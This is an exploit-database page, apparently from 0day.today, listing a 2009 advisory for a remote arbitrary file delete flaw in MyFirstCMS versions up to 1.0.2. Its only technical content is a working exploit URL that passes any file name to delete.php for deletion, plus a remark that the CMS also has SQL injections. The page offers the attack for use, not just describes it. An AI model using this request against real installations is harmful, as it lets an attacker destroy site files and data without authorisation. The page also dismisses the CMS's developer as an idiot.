[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MyFirstCMS <= 1.0.2 Remote Arbitrary File Delete Vulnerability

Author
darkjoker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5243
Category
web applications
Date add
25-05-2009
Platform
unsorted
==============================================================
MyFirstCMS <= 1.0.2 Remote Arbitrary File Delete Vulnerability
==============================================================


--+++==========================================================================+++--
--+++========== MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability ==========+++--
--+++==========================================================================+++--


[+] Author   : darkjoker
[+] Download : http://ostatic.com/myfirstcms


[+] Short note:
This CMS also has other vulnerabilities, such as SQL Injections, but,
unfortuntaly, who wrote this CMS was a bit an idiot, because declared
functions called, for example, 'try', forgot some ';' or '}' somewhere...
Call me lazy or what you want but I don't want to spend time fixing a CMS
just for code an exploit ...

[+] Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]



#  0day.today [2024-12-25]  #